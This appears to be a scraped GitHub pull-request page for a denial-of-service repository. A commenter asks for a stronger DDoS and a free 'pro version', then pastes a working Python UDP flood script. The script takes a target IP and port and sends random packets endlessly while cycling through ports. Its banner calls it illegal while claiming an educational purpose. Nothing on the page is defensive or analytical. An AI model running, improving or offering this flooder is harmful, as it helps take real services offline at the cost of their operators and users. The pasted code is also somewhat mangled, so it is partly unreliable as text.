palahsu / DDoS-Ripper

DDos Ripper a Distributable Denied-of-Service (DDOS) attack server that cuts off targets or surrounding infrastructure in a flood of Internet traffic
Mozilla Public License 2.0
2.18k stars 528 forks source link

Update README.md #70

Open Yamrajjjii opened 10 months ago

Yamrajjjii commented 10 months ago

You have to create more powerful ddos. Which attack faster than this attack. This is old website was scure for this attack.

Yamrajjjii commented 4 months ago

You have to free the pro version of this ddos. You become a hero. You are hero So free pro version for all

[print ("\033[91m") import sys import os import time import socket import random

Code Time

from datetime import datetime now = datetime.now() hour = now.hour minute = now.minute day = now.day month = now.month year = now.year

############## sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) bytes = random._urandom(1490) #############

os.system("clear") os.system("figlet yamrajii") print print "Coded By : yamrajjjii" print "Author : Yamrajjjii" print "Github : github.com/Yamrajjjii" print "Fb Page : facebook.com/Yamrajjjii" print "FB Group : facebook.com/groups/Yamrajjjii" print "Telegram : t.me/Yamrajjjii" print "Join Cracker Space yamrajjjii Group To Get Premium Apk(s) Free" print "Note- This Tool An Illegal Tool & It's Only For Educational Purpose.. Use It At Your Own Risk,We'll Be Not Responsible For Kind Of Problems" print ip = raw_input("IP Target : ") port = input("Port : ") os.system("clear") print("\033[93m") os.system("figlet DdoS Yamrajjj") print("Team : Yamrajjjii") print ("\03392m") print "[ ] 0% " time.sleep(5) print "[===== ] 25%" time.sleep(5) print "[========== ] 50%" time.sleep(5) print "[=============== ] 75%" time.sleep(5) print "[====================] 100%" time.sleep(3) sent = 0 while True: sock.sendto(bytes, (ip,port)) sent = sent + 1 port = port + 1 print "Sent %s packet to %s throught port:%s"%(sent,ip,port) if port == 65534: port = 1